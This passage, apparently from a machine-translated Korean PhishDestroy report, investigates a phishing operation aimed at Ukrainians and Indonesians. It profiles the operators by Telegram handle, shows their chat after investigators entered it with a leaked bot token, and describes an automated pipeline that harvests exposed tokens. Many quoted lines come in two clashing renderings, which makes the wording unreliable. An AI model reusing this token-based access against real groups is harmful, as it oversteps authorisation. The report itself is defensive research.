이 빌어먹을 타고난 놈들, 진짜 멍청이들이야. 여기 앉아 있는 여자가 빌어먹을 돈을 다루고 있는데, ATM에서 카드가 씹혀 버렸잖아.씨발, 너희 진짜 멍청하네. 거기 앉아 있는 그 멍청이가 할머니한테 딴지를 걸더니, ATM이 그 할머니 카드를 삼켜버렸다고 하네.
B
보냐2024-06-16 16:40
@kysia1987 사기 치지 마, 드롭킥을 날리고 6만과 합병했어@kysia1987 사기 사이트라서 안 되더라고요. 조금 투자했다가 6만 잃고 빠져나왔어요.

모네티 에스코바르: 침묵의 보스

보냐의 261개 게시물과는 극명한 대조를 이루는 반면, MONETTI는 단 공개 메시지 10개 — 이 모든 내용이 다음의 단일 스레드에 담겨 있습니다. TraFFeeQ 채팅 (블랙 ADS/SEO 트래픽 차익거래), 동료를 변호하며:

TraFFeeQ 채팅2025년 12월
"사람은 일을 하면 그에 대한 대가를 받는데, 이거에 대해 이야기해 볼까?"
사람은 자기 일을 하고, 그 대가로 돈을 받는데, 뭐가 문제야?)
범죄 행위를 “그저 일일 뿐”이라고 정상화하는 것
TraFFeeQ 채팅2025년 12월
"당신과는 할 말이 없어요"
너랑은 더 이상 논의할 게 없어
무시하는 권위 — 상사식 사고방식, 토론을 거부하는 태도
TraFFeeQ 채팅2025년 12월
"너 말고도 할 일은 한가득이야!"
너 없어도 할 일은 많네)
그의 주의를 요하는 여러 가지 작업이 동시에 진행되고 있음을 의미한다

MONETTI의 Telegram 그룹에서 나머지 내용을 확인할 수 있습니다: 메두사 구글 애즈 (블랙햇 PPC 사기), a 딥페이크 채널 (사기용 합성 미디어), 그리고 말보로 채팅 (비공개, 미상). Telegram 프리미엄 구독, 연중무휴 24시간 운영, 그리고 “Есть предложение”("제안이 하나 있습니다") 그의 사업 이력은 사이버 범죄를 전업으로 삼는 사람의 모습을 여실히 보여준다.

모네티 에스코바르: 전체 메시지 기록 (10개 메시지)
MONETTI ESCOBAR (@monettiescobar) — 전체 번역된 메시지 내역
-- TraFFeeQ 채팅 | 트래픽 중개 | 블랙 ADS/SEO | (9개 메시지) --
ME
모네티 에스코바르2025-12-06 20:42
그냥 놔둬!그건 내버려 둬!
ME
모네티 에스코바르2025-12-06 20:42
한 남자가 자신의 일을 하고 있다그 사람은 자신의 일을 하고 있다
ME
모네티 에스코바르2025-12-06 20:42
공격성 없음어떤 형태의 공격성도 없음
ME
모네티 에스코바르2025-12-06 20:40
그 점도 걱정하지 마세요그 점도 걱정하지 마
ME
모네티 에스코바르2025-12-06 20:39
그 친구한테 말해 봐, 형. 그렇게 하는 게 금지된 건 아니잖아.형, 그 사람하고 좀 얘기해 봐. 그 사람한테 그런 걸 하지 말라고 한 적 없잖아.
ME
모네티 에스코바르2025-12-06 20:39
(너 말고도 할 일이 한가득이야!)(너 말고도 할 일이 있거든!)
ME
모네티 에스코바르2025-12-06 20:39
당신과는 할 말이 없습니다너랑은 더 이상 논의할 게 없어
ME
모네티 에스코바르2025-12-06 20:38
그의 별명 옆에 적혀 있어요. 굳이 툭 쳐볼 필요 없어요, 보면 알 거예요.그 사람 닉네임 옆에 ‘반드시 ‘ты’로 호칭하지 마세요’라고 적혀 있으니, 꼭 읽어보세요.
ME
모네티 에스코바르2025-12-06 20:38
(그 남자는 자신의 일을 하고, 그 대가로 돈을 받는데, 이에 대해 이야기하고 싶네요)사람은 자기 일을 하고, 그 대가로 돈을 받으니, 마음에 들면 토론해 보세요)
-- 메두사 | Google Ads | 채팅 (메시지 1개) --
ME
모네티 에스코바르2025-09-23 18:07
😍😍
MONETTI ESCOBAR Telegram 프로필
스크린샷 2 — MONETTI의 Telegram 프로필.
Bonya의 Telegram 프로필
스크린샷 3 — 보냐의 프로필. DC2(암스테르담)에 주목하세요.

제7장: 패닉 룸

PhishDestroy가 노출된 Telegram 봇을 통해 운영자 그룹에 접속한 후, 다음과 같은 대화가 오갔다. 아래 채팅 기록은 영어로 번역되었으며, 원문의 러시아어 내용은 이탤릭체로 표시되어 있다. 접속에 사용된 신원 정보는 삭제되었다.

운영자 그룹 — “Idr 카드” — 전체 채팅 기록 (61개 메시지)
— REDACTED는 노출된 봇 토큰을 통해 접속했습니다 —
R
삭제됨25-03-2026 13:03:43
/start
ME
모네티 에스코바르25-03-2026 13:06:53
?
ME
모네티 에스코바르25-03-2026 13:07:03
누구누가
B
보냐25-03-2026 13:07:14
XzХз
R
삭제됨25-03-2026 13:07:14
안녕하세요. 데이터를 저장하시려면 잠시만 기다려 주세요.
ME
모네티 에스코바르25-03-2026 13:07:24
뭐야, 씨발뭐야, 씨발
B
보냐25-03-2026 13:07:27
씨발젠장
B
보냐25-03-2026 13:07:28
바로 그 사람이에요누구야?
ME
모네티 에스코바르25-03-2026 13:07:42
그래.아하하
ME
모네티 에스코바르25-03-2026 13:07:44
뭐야, 이 개똥같은?젠장
B
보냐25-03-2026 13:07:53
봇이 해킹당했습니다보타가 망가졌다
B
보냐25-03-2026 13:08:16
우리 수비진이 엉망이라고 들었어.그나저나 우리 방어력이 진짜 미친 수준이라고 들었어
B
보냐25-03-2026 13:08:22
글쎄, 그런 유형이 있긴 하죠뭐, 그런 사람 한 명 정도
B
보냐25-03-2026 13:08:43
마치 피싱 공격을 통해 봇을 해킹하는 것과 같다.우리 봇은 피쉬를 통해 손가락을 부러뜨리듯 아주 쉽게 해치울 수 있다
ME
모네티 에스코바르25-03-2026 13:09:09
@devosus
ME
모네티 에스코바르25-03-2026 13:09:21
[삭제됨].[삭제됨]
ME
모네티 에스코바르25-03-2026 13:09:24
저 사람은 누구예요?이 사람은 누구죠?
B
보냐25-03-2026 13:10:29
프로필을 확인해 보세요.프로필 좀 확인해 봐
B
보냐25-03-2026 13:10:32
해커예요이 사람은 해커입니다
B
보냐25-03-2026 13:10:35
말 그대로.문자 그대로
B
보냐25-03-2026 13:10:41
그가 채널링하고 있는 내용을 번역했다그가 채널에 쓴 내용을 번역해 봤어요
B
보냐25-03-2026 13:10:55
[삭제됨 — 보냐는 자신들의 도메인을 신고한 채널의 메시지를 복사하여 붙여넣으며, 누가 신고했는지 파악하려고 시도한다]
B
보냐25-03-2026 13:12:19
그래서, 음.뭐, 어쩔 수 없지
B
보냐25-03-2026 13:12:23
그게 도대체 누구인지 난 진짜 모르겠어.이게 도대체 누구인지 알 바야말로
B
보냐25-03-2026 13:12:25
하지만 영원히는 아니에요하지만 좋은 일은 아니었지
B
보냐25-03-2026 13:12:47
@devosus 우리가 완전히 박살 나기 전에 방어 전략을 좀 생각해 봐.@devosus, 우리가 완전히 박살 나기 전에 방어책 좀 생각해 봐
편집자 주: 보냐는 그 일이 다가오고 있음을 느낀다. 그가 러시아인이고 우크라이나를 상대로 사기를 치는 것을 “애국적인 행동”이라고 여긴다고 가정해 보자. 그렇다면 인도네시아는 어떨까 — 2024년 10월부터 BRICS 파트너 (카잔 정상회담)? 동맹국의 시민들을 상대로 물건을 훔치는 것도 애국적인 행동인가? CIS 사기꾼들은 지능도 충성도 전혀 없는, 누구에게나 가리지 않고 훔치는 도둑들이다. 우리가 이를 입증한 다른 조사 기사들을 읽어보라. 기소 사례 비슷한 연산자들의 경우 — 결말은 항상 똑같다.
ME
모네티 에스코바르25-03-2026 13:12:49
네, 그렇네요.네, 보입니다
ME
모네티 에스코바르25-03-2026 13:12:55
엿 먹어.뭐, 헛소리 하지 마
B
보냐25-03-2026 13:13:09
뭐, 기력이 쭉 빠지는 것도 그리 짜릿한 일은 아니죠.뭐, 합쳐지는 것도 그리 신나는 일은 아니지
ME
모네티 에스코바르25-03-2026 13:13:13
그는 아무것도 하지 않을 거야그는 아무것도 하지 않을 거야
ME
모네티 에스코바르25-03-2026 13:13:18
그 사람이 뭘 하려나?그가 무엇을 팔아넘길까?
D
데보이스25-03-2026 13:13:26
그게 무엇인지이게 뭐야
ME
모네티 에스코바르25-03-2026 13:13:34
그래, 한 남자가 가입했어그 사람이 합류했네요
D
데보이스25-03-2026 13:13:34
어디서부터어디서
B
보냐25-03-2026 13:13:35
비록 자신의 IP로 피싱 사이트에 몇 번 접속했다 해도, 이제는 더 이상 괜찮은 일이 아닙니다.자신의 IP 주소로 피쉬에 두어 번 접속해 봤다고 해도 이제 재미가 없다
ME
모네티 에스코바르25-03-2026 13:13:37
그룹 여러분께그룹으로
ME
모네티 에스코바르25-03-2026 13:13:38
XzХз
D
데보이스25-03-2026 13:13:39
interpol을 사용할 때인터폴에 있을 때
D
데보이스25-03-2026 13:13:41
이에어떤
ME
모네티 에스코바르25-03-2026 13:13:44
이거
B
보냐25-03-2026 13:13:46
그냥 수다 좀 떨려고 들어왔어요이 채팅방에 들어왔네요
B
보냐25-03-2026 13:13:49
그는 다음과 같이 썼다.이렇게 썼다
ME
모네티 에스코바르25-03-2026 13:13:56
.
B
보냐25-03-2026 13:13:57
안녕하세요. 데이터를 저장하시려면 잠시만 기다려 주세요.
ME
모네티 에스코바르25-03-2026 13:14:11
[사진 공유]
D
데보이스25-03-2026 13:14:31
전에도 본 적이 있어요.나도 그런 거 본 적 있어
B
보냐25-03-2026 13:14:44
음, 우리도 ukr 봇 문제로 적발됐네요.뭐, 우린 우크라이나 봇 때문에 고생했지
B
보냐25-03-2026 13:14:55
당신은 채팅방에서 메시지를 보내지 않았어요.채팅창에 글을 안 올렸을 뿐이에요
B
보냐25-03-2026 13:14:57
당신이 쓴 게 아니었나요?아니, 글을 썼다고 했잖아
ME
모네티 에스코바르25-03-2026 13:15:04
전 전혀 신경 안 써요.뭐, 어차피 상관없어
B
보냐25-03-2026 13:15:06
이 채널을 대표하여채널을 대표하여
D
데보이스25-03-2026 13:15:23
그건 개뿔이나 신경 쓰지 마.아, 엿이나 먹어
ME
모네티 에스코바르25-03-2026 13:15:31
이 그룹을 해체할 거야이 그룹을 삭제합니다
B
보냐25-03-2026 13:15:35
+
D
데보이스25-03-2026 13:15:35
да
— 소유자가 그룹을 삭제했습니다 —

그 그룹은 몇 분 만에 삭제되었다. 보냐가 남긴 마지막 반응인 “+”와 데보이가 “응”이라고 답한 것만으로도 모든 상황이 설명된다: 그들은 자신의 정체가 들통났다는 것을 알고 있었고, 증거를 없애는 것만이 유일한 선택지였다. 하지만 그때쯤에는 데이터가 이미 수집된 후였다.

보냐의 의미심장한 발언을 주목해 보자: "우크라이나 봇에서도 공격을 받았어요" — 두 프로젝트(우크라이나 및 인도네시아) 모두 동일한 운영 팀을 공유하고 있으며, 이들의 인프라가 침해당한 것은 이번이 처음이 아니라는 점이 확인되었다.

제8절: 이것이 시사하는 바

PhishDestroy의 작동 원리

에 표시되는 모든 도메인은 phishdestroy.io 이 자동화된 Pipeline을 거칩니다. dopomogvoina[.]sbs도 예외는 아니었습니다.

탐지
정적 분석
인프라 매핑
기원 탐구
OSINT
보고서 생성

수사 일지

2026년 3월 20일
도메인 dopomogvoina[.]sbs NiceNIC International을 통해 등록됨
2026년 3월 21일
PhishDestroy의 자동 모니터링 Pipeline에 의해 탐지됨
2026년 3월 21일
완전 자동화된 분석 완료: 인프라 매핑, JS 번들 난독화 해제, WebSocket 프로토콜 문서화
2026년 3월 22일
원본 IP 확인됨. 동일한 서버에서 두 번째 피싱 프로젝트("HealthCare ID") 발견됨
2026년 3월 22일
드러나다 config.json 이를 통해 Telegram 봇 API를 통해 운영자를 식별할 수 있습니다.
2026년 3월 23일
호스팅 제공업체, Cloudflare 및 관련 CERT에 제출된 악용 신고
2026년 3월 25일
기사 게시됨. 도메인 보고서가 PhishDestroy에 공개되었습니다.

이것이 가능했던 이유: PhishDestroy의 봇 인텔리전스 네트워크

이번 조사는 전적으로 다음 기관에 의해 수행되었습니다. 자동화 시스템. PhishDestroy의 Pipeline은 단순히 피싱 도메인을 탐지하는 데 그치지 않고, 그 배후에 있는 운영자의 인프라까지 침투합니다.

2,000+
Telegram 봇 정보 유출
활성
일부 봇은 여전히 모니터링 중
2024년부터
컬렉션 실행 중

피싱 키트가 Telegram 봇 토큰을 노출시킬 때 — 이 사례가 그랬듯이 config.json — 당사 시스템은 이를 자동으로 수집하고, 운영자 그룹을 매핑하며, 구성원 목록을 추출하고, 메시지 기록을 보관합니다. 2,000개 이상의 봇 2024년부터 이런 방식으로 수집되어 왔습니다. 그중 일부는 여전히 활동 중이며, 우리는 범죄자들이 실시간으로 활동하는 모습을 지켜보는 것을 즐깁니다. 결말은 이미 정해져 있으니까요.

계정을 삭제하거나 그룹을 초기화하는 운영자조차도 이미 때는 늦은 것입니다. 그들이 당황할 때쯤이면, 우리는 이미 모든 것을 확보한 뒤입니다. 메시지 기록, 프로필 데이터, 그룹 가입 내역, 연결된 봇까지 말이죠. 삭제한다고 해서 달라지는 건 없다. 그 데이터는 이미 존재했고, 지금은 우리 데이터베이스에 저장되어 있습니다.

"나를 기다려" — 사기꾼 버전

이 사례는 특별한 경우가 아닙니다. 이는 바로 NiceNIC의 체계적인 태만 우리는 이를 “메가 해커”의 예로 들기로 했습니다. “Типичный Мошенник”이 정확히 지적했듯이, 해커와 사기꾼 사이에는 차이가 있습니다 — 정보. 이 운영자들은 해커도 아니고 똑똑하지도 않다.

PhishDestroy의 시스템은 수천 개의 도메인에 걸쳐 이와 같은 증거를 자동으로 수집합니다. 봇을 추적하고, 운영자의 통신 내역을 보관하며, 인프라를 매핑하는 식이죠. 이번 사례는 너무 터무니없어서 공개하지 않을 수 없었습니다. 피싱 키트는 시중에서 흔히 구할 수 있는 수준이고, OPSEC은 전무한 데다, 운영자들은 발각된 지 불과 몇 분 만에 당황한 나머지 그룹을 삭제해 버렸습니다.

저희는 다음과 같은 내용을 표시해 줄 시스템을 구축하고 있습니다. 도메인 보고서 페이지에서 직접 확인된 운영자 신원 정보 — 사기꾼에서 피해자로, 러시아 TV 프로그램 “Жди Меня”(나를 기다려)와 비슷하지만 순서가 반대다. 이 프로그램은 2024년부터 비공개 모드로 운영되어 왔다. 계정을 삭제한 사람들을 포함해 이미 많은 운영자가 신원이 확인되었다. 우리는 지금 가장 흥미롭네요 이를 소개하는 방식입니다. 계속 지켜봐 주세요.

관련 도메인

우리의 분석을 통해 두 번째 영역이 확인되었는데 — hlpforvpeople[.]sbs — 동일한 등록 기관을 통해 등록되었으며 인프라 패턴이 일치합니다. 두 도메인 모두 당사 데이터베이스에 기록되어 있습니다:

등록기관 규정 미준수: NiceNIC International

NiceNIC International Group Co., Limited (홍콩)은 다음을 수상했습니다. 여러 건의 상세한 학대 신고 PhishDestroy가 두 가지 모두에 대해 언급한 내용 dopomogvoina[.]sbs 그리고 hlpforvpeople[.]sbs. 이 기사가 발행된 시점에는 — 첫 보고 후 5일 뒤 — 아무런 조치도 취해지지 않았습니다. 두 도메인 모두 정상적으로 운영되고 있습니다.

이는 단발성 사례가 아닙니다. NiceNIC은 저희 조사 과정에서 반복적으로 나타나는 문제입니다. 해당 등록기관의 악용 신고 연락처(abuse@nicenic.net)는 증거가 가득한 피싱 신고에 대해 계속해서 아무런 대응도 하지 않고 있습니다. ICANN 공인 등록기관으로서 등록기관 인증 계약(RAA §3.18)을 준수해야 함에도 불구하고, NiceNIC은 아무런 제재도 받지 않는 듯이 운영되고 있습니다.

NiceNIC은 러시아어 서비스를 운영하며, 다음을 판매합니다. .ru 이 업체는 도메인을 프리미엄 가격(약 200달러)에 판매하며, 러시아어권 이용자들에게 인기 있는 플랫폼인 VK와 Telegram을 통해 고객과 소통합니다. 이 업체의 고객층이 지하 커뮤니티와 겹친다는 점은, 악용 신고에 대한 등록 기관의 무대응이 단순한 태만인지, 아니면 의도적인 사업 전략인지에 대한 심각한 의문을 제기합니다.

이 조사 결과는 일부가 다음과 같이 게재되었습니다. NICENIC의 장기간에 걸친 무대응으로 인해. 등록기관이 피싱 악용 사례에 대해 조치를 취하지 않을 경우, 대중에게 이를 공개하는 것이 유일한 책임 추궁 수단이 된다.

주요 내용

  • 자동화야말로 변화의 속도를 따라잡을 수 있는 유일한 방법입니다. 피싱 키트는 몇 시간 만에 배포되고 악용됩니다. 수동 검토만으로는 이에 대응할 수 있는 규모를 확보할 수 없습니다.
  • 운영자들도 실수를 합니다. 부수적인 프로젝트에서 노출된 설정 파일 하나로 인해 다국적 피싱 작전 전체가 적발되었습니다. 모든 프로젝트에서 완벽한 OPSEC을 유지하기는 어렵습니다.
  • 사회 공학은 뉴스의 흐름에 따라 진화합니다. 전쟁, 인도적 지원, 정부 지원 프로그램은 곤경에 처한 사람들을 표적으로 삼아, 이들이 그 정당성을 의심할 가능성이 적기 때문에 피싱 미끼로 점점 더 많이 악용되고 있다.
  • 인프라 재사용은 이제 일반적인 관행입니다. 서버 한 대, 피싱 프로젝트 두 개, 국가 두 곳, 운영자는 동일하다. 인프라 연결 관계를 파악하면 단일 도메인을 개별적으로 분석하는 것보다 훨씬 더 많은 정보를 얻을 수 있다.

관련 연구

PhishDestroy의 자동화된 인텔리전스 Pipeline을 통한 추가 조사 결과

트러스트월렛 패널 정보 유출
관리자 패널 해킹 사건으로 운영자의 채팅 기록이 포함된 다국적 암호화폐 피싱 작전이 드러났다.
암호화폐 탈취 네트워크 실체 밝혀져
DeFi 사용자를 노리는, 지갑 자금을 탈취하는 피싱 키트의 배후 인프라를 분석한다.
NiceNIC: 사이버 범죄를 조장하는 등록기관
ICANN 공인 등록기관이 어떻게 악용 신고를 지속적으로 무시해 왔는지 — 이번 조사와 관련된 신고도 예외는 아니다.
xmrwallet의 실체: 10년 동안 도난당한 키들
자바스크립트 분석과 도메인 포렌식을 통해 밝혀진 10년 동안 이어진 모네로 지갑 사기 사건.
사기 조직의 실체 적발
공유 호스팅, 공유 운영자 — 피싱 네트워크가 여러 캠페인에 걸쳐 인프라를 재사용하는 방식.
BuyTRX 드레이너의 실체
TRON 기반의 에너지 사기 수법이 악성 스마트 계약 승인을 통해 지갑 자금을 빼돌리고 있다.

면책 조항: 이번 조사는 전적으로 수동 정찰과 공개 API를 통해 수행되었습니다. 어떠한 시스템에 대해서도 무단 접근은 이루어지지 않았습니다. Telegram 봇 API 호출에는 운영자가 인증이 필요 없는 엔드포인트에 공개한 토큰이 사용되었습니다. 이 기사에 언급된 모든 도메인 이름은 표준 정보 보안 관행에 따라 식별 정보를 제거했습니다.

이 조사 결과 공유하기

X / Twitter Telegram 레딧 LinkedIn

관련 조사

암호화폐 피싱의 실체: 실제 시드 문구 탈취 프로그램 8종 리버스 엔지니어링 분석
심층 취재
암호화폐 피싱의 실체: 실제 시드 문구 탈취 프로그램 8종 리버스 엔지니어링 분석
사기꾼들의 실체: 4가지 사기 백엔드 분석
조사
사기꾼들의 실체: 4가지 사기 백엔드 분석
$0 Takedowns: How We Disrupt Phishing Infrastructure
조사
$0 Takedowns: How We Disrupt Phishing Infrastructure